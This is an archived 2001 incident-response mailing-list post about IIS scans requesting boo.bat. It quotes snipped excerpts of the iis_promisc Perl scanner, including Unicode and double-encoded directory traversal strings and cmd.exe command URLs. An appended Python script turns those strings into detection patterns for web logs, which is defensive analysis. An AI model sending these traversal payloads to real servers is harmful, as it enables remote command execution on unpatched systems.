Since the security focus page doesn't actually list the source, I'll quote the relevant parts below. For those of you who are curious (I was) someone found me the translation of MinhaNossaSenhoraDoPerpetuoSocorro. It means Our Lady of Perpetual Help, referring to Mary. Interesting invocation to hack under.

--
Jordan Wiens
UF Network Incident Response Team
(352)392-2061

On Mon, 2 Jul 2001, Jordan K Wiens wrote:

> Anyone seen an iis scan that attempts to access boo.bat among other
> requests along with directory traversal attempts? I found the source of
> the script on the web but no mention is made of what boo.bat is included
> for. Anyone know what this is?
>
> http://www.securityfocus.com/tools/2060
>
>

-----------IIS_PROMISC EXCERPTS----------------
#!/usr/bin/perl
#
# iis_promisc v2.0
#
# This is a perl script to test the infamous
# Microsoft IIS holes:
#
# -*- Escaped Characters Decoding Bug
# -*- Unicode Directory Transversal Bug
#
# * Support Proxy Server
# * Over 20 tests will be made ( if found display the patch URL too :)
#
# Added to v2:
#
# -*- Executable File Parsing Bug check
# -*- Over 40 bugs tested!
#
# * REQUIRE LWP(Lib WWW for Perl) http://www.linpro.no/lwp/
# The package libwww is found in many linux distributions
#
# by inodeat_private
# greetz to #unsekure @ irc.brasnet.org
# http://unsekure.com.br
#
# 05/2001
.
.
[SNIP]
.
$test_command = "winnt/system32/cmd.exe?/c+echo+MinhaNossaSenhoraDoPerpetuoSocorro";
$dir_command = "winnt/system32/cmd.exe?/c+dir";
$iis = "1";

my @dir=( # You can add more exec dirs here
#"/somedir/",
"/", ## wwwroot
"/scripts/",
"/msadc/",
"/cgi-bin/",
"/bin/",
"/samples/",
"/_vti_cnf/",
"/_vti_bin/",
"/adsamples/",
"/iisadmpwd/",
"/Rpc/",
"/PBServer/");

my @string=(
"..%255c..%255c..%255c..%255c..%255c..%255c",
"..%c0%af../..%c0%af../..%c0%af../",
"..%e0%80%af../..%e0%80%af../..%e0%80%af../",
"boo.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C");
.
.
[SNIP]
.

And the rest is pretty straight forward. Nothing too tricky.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
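
Added example, not part of the original post or of iis_promisc: a small log triage script that tags requests carrying the strings quoted in the excerpt above and groups them by source address. The log format (`src method uri status`), the sample lines, the signature names and the assumption that the script requests directory + traversal string + command with the URI logged as sent are all constructed for illustration.

```python
import re
from collections import defaultdict

# Signatures built from the strings in the quoted excerpt, matched
# case-insensitively against the raw (undecoded) request URI.
SIGNATURES = {
    "double_encoded_backslash": re.compile(r"\.\.%255c", re.I),
    "overlong_utf8_slash": re.compile(r"\.\.%(?:c0%af|e0%80%af)", re.I),
    "overlong_utf8_backslash": re.compile(r"\.\.%c1%9c", re.I),
    "boo_bat_prefix": re.compile(r"/boo\.bat/\.\.", re.I),
    "cmd_exe_invocation": re.compile(r"cmd\.exe\?/c\+", re.I),
    "scanner_marker": re.compile(r"echo\+MinhaNossaSenhoraDoPerpetuoSocorro", re.I),
}
ENCODINGS = {"double_encoded_backslash", "overlong_utf8_slash", "overlong_utf8_backslash"}

# Constructed sample log (documentation addresses), assumed format:
# src method uri status
SAMPLE_LOG = [
    "192.0.2.10 GET /scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+echo+MinhaNossaSenhoraDoPerpetuoSocorro 404",
    "192.0.2.10 GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+MinhaNossaSenhoraDoPerpetuoSocorro 404",
    "192.0.2.10 GET /scripts/boo.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir 404",
    "198.51.100.7 GET /index.html 200",
    "198.51.100.7 GET /downloads/boo.bat 404",  # bare filename: must not match
]

def classify(uri):
    """Return the sorted names of every signature found in a request URI."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(uri))

def scan_log(lines):
    """Map each source address to the set of signatures it triggered."""
    hits = defaultdict(set)
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue  # skip malformed lines
        hits[parts[0]].update(classify(parts[2]))
    return {src: sigs for src, sigs in hits.items() if sigs}

def suspected_scanners(lines):
    """Sources that sent the echo marker or tried two or more traversal encodings."""
    return sorted(src for src, sigs in scan_log(lines).items()
                  if "scanner_marker" in sigs or len(sigs & ENCODINGS) >= 2)

if __name__ == "__main__":
    for src, sigs in scan_log(SAMPLE_LOG).items():
        print(src, sorted(sigs))
    print("suspected:", suspected_scanners(SAMPLE_LOG))
```

A single traversal encoding from one source is reported by `scan_log` but not escalated by `suspected_scanners`; the echo marker or a spread of encodings is what points at a multi-test script like the one quoted.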
This archive was generated by hypermail 2b30 : Mon Jul 02 2001 - 21:43:29 PDT